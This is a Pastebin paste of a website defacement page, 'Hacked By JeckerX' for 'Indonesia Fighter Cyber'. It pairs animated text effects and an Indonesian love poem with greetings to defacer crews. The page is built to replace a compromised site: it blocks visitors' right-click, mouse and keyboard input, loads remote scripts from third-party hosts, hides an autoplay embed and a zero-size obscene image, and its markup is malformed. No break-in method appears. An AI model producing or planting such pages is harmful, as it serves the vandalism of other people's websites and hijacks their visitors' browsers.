Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <title> ҳ̸Ҳ̸ҳ Hacked By JeckerX ҳ̸Ҳ̸ҳ </title>
- <Script Language='Javascript'>
- <!-- ҳ̸Ҳ̸ҳ Hacked By JeckerX ҳ̸Ҳ̸ҳ -->
- <!--
- function ClearError() {return true;}
- window.onerror = ClearError;
- </script>
- <br>
- <br>
- <div align="center"><table border="0" width="70%"><tr><td>
- <h1><font face="Bradley Hand ITC"><center><SCRIPT>
- farbbibliothek = new Array();
- farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
- farbbibliothek[1] = new Array("#FF0000","#FFFFFF","#FFFFFF","#FF0000");
- farbbibliothek[2] = new Array("#FFFFFF","#FF0000","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF");
- farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
- farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
- farbbibliothek[5] = new Array("#FF0000","#FF0000","#FF0000","#FFFFFF","#FFFFFF","#FFFFFF");
- farbbibliothek[6] = new Array("#FF0000","#FDF5E6");
- farben = farbbibliothek[4];
- function farbschrift()
- {
- for(var i=0 ; i<Buchstabe.length; i++)
- {
- document.all["a"+i].style.color=farben[i];
- }
- farbverlauf();
- }
- function string2array(text)
- {
- Buchstabe = new Array();
- while(farben.length<text.length)
- {
- farben = farben.concat(farben);
- }
- k=0;
- while(k<=text.length)
- {
- Buchstabe[k] = text.charAt(k);
- k++;
- }
- }
- function divserzeugen()
- {
- for(var i=0 ; i<Buchstabe.length; i++)
- {
- document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>");
- }
- farbschrift();
- }
- var a=1;
- function farbverlauf()
- {
- for(var i=0 ; i<farben.length; i++)
- {
- farben[i-1]=farben[i];
- }
- farben[farben.length-1]=farben[-1];
- setTimeout("farbschrift()",30);
- }
- //
- var farbsatz=1;
- function farbtauscher()
- {
- farben = farbbibliothek[farbsatz];
- while(farben.length<text.length)
- {
- farben = farben.concat(farben);
- }
- farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
- }
- setInterval("farbtauscher()",9000);
- text ="INDONESIA FIGHTER CYBER";//h
- string2array(text);
- divserzeugen();
- //document.write(text);
- </SCRIPT></center></h1></font>
- <SCRIPT>
- var width=document.body.clientWidth;
- var height=document.body.clientHeight;
- function doClickText(who,type,step,timeOut) {
- document.getElementById(who).style.display="none";
- if(type==0) {
- reveal('revealDiv1',step,timeOut,0);
- reveal('revealDiv2',step,timeOut,1);}
- if(type==1) {
- reveal('revealDiv1',step,timeOut,2);
- reveal('revealDiv2',step,timeOut,3);}}
- function reveal(who,step,timeOut,type) {
- if(type==0)
- var where="top";
- if(type==1)
- var where="bottom";
- if(type==2)
- var where="left";
- if(type==3)
- var where="right";
- eval('var temp=document.getElementById(who).style.'+where);
- temp=parseInt(temp);
- if(type==0||type==1)
- var checkWith=height/2;
- if(type==2||type==3)
- var checkWith=width/2;
- if(-temp<checkWith) {
- temp-=step;
- eval('document.getElementById(who).style.'+where+'=temp;');
- setTimeout("reveal('"+who+"',"+step+",'"+timeOut+"',"+type+")", timeOut);}
- else {
- document.getElementById(who).style.display="none";
- document.body.scroll="yes";}}
- function initReveal(type,div1bg,div2bg,div1bw,div2bw,div1bc,div2bc,step,timeOut,click) {
- if(type==0) {
- var bWhere1="border-bottom";
- var bWhere2="border-top";
- var putZero1="top:0px; left:0px";
- var putZero2="bottom:0px; left:0px";
- document.write('<div id="revealDiv1" style="z-index:100; display:block; position:absolute; '+putZero1+'; background:'+div1bg+' ; width:'+(width)+'; height:'+(height/2)+'; '+bWhere1+':'+div1bc+' solid '+div1bw+'px"></div>');
- document.write('<div id="revealDiv2" style="z-index:100; display:block; position:absolute; '+putZero2+'; background:'+div2bg+' ; width:'+(width)+'; height:'+(height/2)+'; '+bWhere2+':'+div2bc+' solid '+div2bw+'px"></div>');
- if(!click) {
- reveal('revealDiv1',step,timeOut,0);
- reveal('revealDiv2',step,timeOut,1);}
- else {
- clickText(type,step,timeOut);}}
- if(type==1) {
- var bWhere1="border-right";
- var bWhere2="border-left";
- var putZero1="top:0px; left:0px";
- var putZero2="top:0px; right:0px";
- document.write('<div id="revealDiv1" style="z-index:100; display:block; position:absolute; '+putZero1+'; background:'+div1bg+' ; width:'+(width/2)+'; height:'+(height)+'; '+bWhere1+':'+div1bc+' solid '+div1bw+'px"></div>');
- document.write('<div id="revealDiv2" style="z-index:100; display:block; position:absolute; '+putZero2+'; background:'+div2bg+' ; width:'+(width/2)+'; height:'+(height)+'; '+bWhere2+':'+div2bc+' solid '+div2bw+'px"></div>');
- if(!click) {
- reveal('revealDiv1',step,timeOut,2);
- reveal('revealDiv2',step,timeOut,3);}
- else {
- clickText(type,step,timeOut);}}
- function clickText(type,step,timeOut) {
- document.write('<div id="clickText" style="z-index:101; display:block; position:absolute; top:'+(height/2-clickh/2-clickb)+'; left:'+(width/2-clickw/2-clickb)+'"><table style="border:'+clickc+' solid '+clickb+'px; background:'+clickbg+' ;width:'+clickw+'px; height:'+clickh+'; '+clickFont+'; cursor:hand; cursor:pointer" onClick="doClickText(\'clickText\','+type+','+step+','+timeOut+')"><tr><td align="middle">'+clickt+'</td></tr></table></div>');}}
- </SCRIPT>
- <SCRIPT>
- var clickw=270;
- var clickh=20;
- var clickb=2;
- var clickc="white";
- var clickbg="black"; // Background color
- var clickt="=[[ <blink>O P E N</blink> ]]="; // Text to display
- var clickFont="font-family:Tahoma,arial,helvetica; font-size:10pt; font-weight:bold; color:red"; // The font style of the text
- new initReveal(0,'black','black',1,1,'lime','lime',3,10,true);
- </SCRIPT>
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="<$BlogLanguageDirection$>">
- <script>
- TypingText = function(element, interval, cursor, finishedCallback) {
- if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
- this.running = true; // Never run.
- return;
- }
- this.element = element;
- this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
- this.interval = (typeof interval == "undefined" ? 100 : interval);
- this.origText = this.element.innerHTML;
- this.unparsedOrigText = this.origText;
- this.cursor = (cursor ? cursor : "");
- this.currentText = "";
- this.currentChar = 0;
- this.element.typingText = this;
- if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
- TypingText.all.push(this);
- this.running = false;
- this.inTag = false;
- this.tagBuffer = "";
- this.inHTMLEntity = false;
- this.HTMLEntityBuffer = "";
- }
- TypingText.all = new Array();
- TypingText.currentIndex = 0;
- TypingText.runAll = function() {
- for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
- }
- TypingText.prototype.run = function() {
- if(this.running) return;
- if(typeof this.origText == "undefined") {
- setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
- return;
- }
- if(this.currentText == "") this.element.innerHTML = "";
- // this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
- if(this.currentChar < this.origText.length) {
- if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
- this.tagBuffer = "<";
- this.inTag = true;
- this.currentChar++;
- this.run();
- return;
- } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
- this.tagBuffer += ">";
- this.inTag = false;
- this.currentText += this.tagBuffer;
- this.currentChar++;
- this.run();
- return;
- } else if(this.inTag) {
- this.tagBuffer += this.origText.charAt(this.currentChar);
- this.currentChar++;
- this.run();
- return;
- } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
- this.HTMLEntityBuffer = "&";
- this.inHTMLEntity = true;
- this.currentChar++;
- this.run();
- return;
- } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
- this.HTMLEntityBuffer += ";";
- this.inHTMLEntity = false;
- this.currentText += this.HTMLEntityBuffer;
- this.currentChar++;
- this.run();
- return;
- } else if(this.inHTMLEntity) {
- this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
- this.currentChar++;
- this.run();
- return;
- } else {
- this.currentText += this.origText.charAt(this.currentChar);
- }
- this.element.innerHTML = this.currentText;
- this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
- this.currentChar++;
- setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
- } else {
- this.currentText = "";
- this.currentChar = 0;
- this.running = false;
- this.finishedCallback();
- }
- }
- </script>
- <br><left>
- <div id="example1"></div>
- <p id="example2">
- <span style="font-size: 0px;"><font color="blue" face="Harrington">****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************</font><span></span></span></b><br>
- <span style="font-size: 19px"><font face="Tempus" color="lime">Banyak Sekali Wanita Yang Kukenal<br>
- Dan Ada Juga Yang Mencintaiku<br>
- Tapi Aku Tak Bisa Menerimanya...<br>
- Karena Aku masih sayang dirimu<br>
- Walaupun Engkau Telah Membuangku Dipinggir jalan :'(<br>
- Tetapi itu tidak membuatku putus asa...<br>
- Terbanglah engkau bersama Merpati Pilihanmu<br>
- Aku Masihh Mencintaimu<br>
- Tapi Apadaya tuhan belum menjodohkan kita<br>
- biarlah aku disini merenung sepi<br>
- untuk mengharapkan cinta darimu :)<br>
- </font><span><br>
- <span style="font-size: 22px"><font face="Tempus" color="lime">: By Tinton Hacker Patah Hati <br><br>
- <span style="font-size: 19px"><font face="Tempus" color="lime">Thanks To : <br>
- | Antonio Hsh | eX-Sh1ne | Java Defacer Team | Ardan Sparkling | Admin07 | R10 | IFC | walace | <br>
- | Mr.D | MasBro_43 | X-Gen | Unknow_R | FaZuL | Angel Dot Id | ice cream | Black Angel | </font><span></i><br>
- </center>
- </p>
- <script type="text/javascript">
- //Define first typing example:
- new TypingText(document.getElementById("example1"));
- //Define second typing example (use "slashing" cursor at the end):
- new TypingText(document.getElementById("example2"), 80, function(i){
- var ar = new Array("_"," ","_","_"); return " " + ar[i.length %
- ar.length]; });
- //Type out examples:
- TypingText.runAll();
- </script>
- <style type="text/css">body {cursor:url("http://s17.postimage.org/lni9061ej/thcursor.png"),default}</style>
- <link rel="icon" type="image/gif" href="http://i48.servimg.com/u/f48/16/08/07/74/indone10.gif">
- <head>
- <title>ҳ̸Ҳ̸ҳ INDONESIA FIGHTER CYBER ҳ̸Ҳ̸ҳ</title> <style type="text/css"><!-- a:link{color:#ffffff;text-decoration:none}--></style> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><script language="JavaScript">function tb5_makeArray(n){ this.length = n; return this.length;
- }
- tb5_messages = new tb5_makeArray(2);
- tb5_messages[0] = "Hacked By JeckerX";
- tb5_messages[1] = "Indonesia Fighter Cyber";
- tb5_rptType = 'infinite';
- tb5_rptNbr = 100;
- tb5_speed = 200;
- tb5_delay = 50;
- var tb5_counter=1;
- var tb5_currMsg=0;
- var tb5_stsmsg="";
- function tb5_shuffle(arr){
- var k;
- for (i=0; i<arr.length; i++){ k = Math.round(Math.random() * (arr.length - i - 1)) + i; temp = arr[i];arr[i]=arr[k];arr[k]=temp;
- }
- return arr;
- }
- tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
- tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
- for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){ tb5_arr[i] = i; tb5_sts[i] = "_";
- }
- tb5_arr = tb5_shuffle(tb5_arr);
- function tb5_init(n){
- var k;
- if (n == tb5_arr.length){ if (tb5_currMsg == tb5_messages.length-1){ if ((tb5_rptType == 'finite') && (tb5_counter==tb5_rptNbr)){ clearTimeout(tb5_timerID); return; } tb5_counter++; tb5_currMsg=0; } else{ tb5_currMsg++; } n=0; tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length); tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length); for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){ tb5_arr[i] = i; tb5_sts[i] = "_"; } tb5_arr = tb5_shuffle(tb5_arr); tb5_sp=tb5_delay;
- }
- else{ tb5_sp=tb5_speed; k = tb5_arr[n]; tb5_sts[k] = tb5_messages[tb5_currMsg].charAt(k); tb5_stsmsg = ""; for (var i=0; i<tb5_sts.length; i++) tb5_stsmsg += tb5_sts[i]; document.title = tb5_stsmsg; n++; } tb5_timerID = setTimeout("tb5_init("+n+")", tb5_sp);
- }
- function tb5_randomizetitle(){ tb5_init(0);
- }
- tb5_randomizetitle();</script><script>/*
- An object-oriented Typing Text script, to allow for multiple instances.
- A script that causes any text inside any text element to be "typed out", one letter at a
- time. Note that any HTML tags will not be included in the typed output, to prevent them
- from causing problems. Tested in Firefox v1.5.0.1, Opera v8.52, Konqueror v3.5.1, and IE
- v6.
- Browsers that do not support this script will simply see the text fully displayed from the
- start, including any HTML tags.
- Functions defined: TypingText(element, [interval = 100,] [cursor = "",] [finishedCallback = function()
- {return}]): Create a new TypingText object around the given element. Optionally specify a delay between characters of interval milliseconds. cursor allows users to specify some HTML to be appended to the end of the string whilst typing. Optionally, can also be a function which accepts the current text as an argument. This allows the user to create a "dynamic cursor" which changes depending on the latest character or the current length of the string. finishedCallback allows advanced scripters to supply a function to be executed on finishing. The function must accept no arguments. TypingText.run(): Run the effect. static TypingText.runAll(): Run all TypingText-enabled objects on the page.
- */
- TypingText = function(element, interval, cursor, finishedCallback) { if((typeof document.getElementById == "undefined") || (typeof element.innerHTML ==
- "undefined")) { this.running = true; // Never run. return; } this.element = element; this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; }); this.interval = (typeof interval == "undefined" ? 100 : interval); this.origText = this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor = (cursor ? cursor : ""); this.currentText = ""; this.currentChar = 0; this.element.typingText = this; if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++; TypingText.all.push(this); this.running = false; this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity = false; this.HTMLEntityBuffer = "";
- }
- TypingText.all = new Array();
- TypingText.currentIndex = 0;
- TypingText.runAll = function() { for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
- }
- TypingText.prototype.run = function() { if(this.running) return; if(typeof this.origText == "undefined") { setTimeout("document.getElementById('" + this.element.id + "').typingText.run()",
- this.interval); // We haven't finished loading yet. Have patience. return; } if(this.currentText == "") this.element.innerHTML = "";
- // this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text. if(this.currentChar < this.origText.length) { if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) { this.tagBuffer = "<"; this.inTag = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) { this.tagBuffer += ">"; this.inTag = false; this.currentText += this.tagBuffer; this.currentChar++; this.run(); return; } else if(this.inTag) { this.tagBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) { this.HTMLEntityBuffer = "&"; this.inHTMLEntity = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) { this.HTMLEntityBuffer += ";"; this.inHTMLEntity = false; this.currentText += this.HTMLEntityBuffer; this.currentChar++; this.run(); return; } else if(this.inHTMLEntity) { this.HTMLEntityBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else { this.currentText += this.origText.charAt(this.currentChar); } this.element.innerHTML = this.currentText; this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof
- this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : ""); this.currentChar++; setTimeout("document.getElementById('" + this.element.id + "').typingText.run()",
- this.interval); } else { this.currentText = ""; this.currentChar = 0; this.running = false; this.finishedCallback(); }
- }</script>
- <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
- <body style="background-color:#000;background-image:url(http://upload.kapanlagi.com/c.php?f=201211250626374_protect_your_blog_from_being_hacked_50b157ad35752.jpeg);background-repeat:repeat-y;background-position:top right ;">
- <script type="text/javascript" src="http://cayunkatel.googlecode.com/files/rainbows.js"></script>
- <script type="text/javascript" src="http://www.sis-kj.com/js/3.js"></script>
- <span id="fullpost"><script src='http://agungosx.googlepages.com/saljubirumuda.js' type='text/javascript'></script></span>
- <span id="fullpost"><script src='http://agungosx.googlepages.com/saljuputih.js' type='text/javascript'></script></span>
- <embed src="http://youtube.googleapis.com/v/IaZ0GAcYio4&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
- </body>
- </html>
- '));
- //-->
- </Script>
- <center><img src="http://s8.postimage.org/41we234fp/fuck_you.jpg" height="0" width="0"></center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement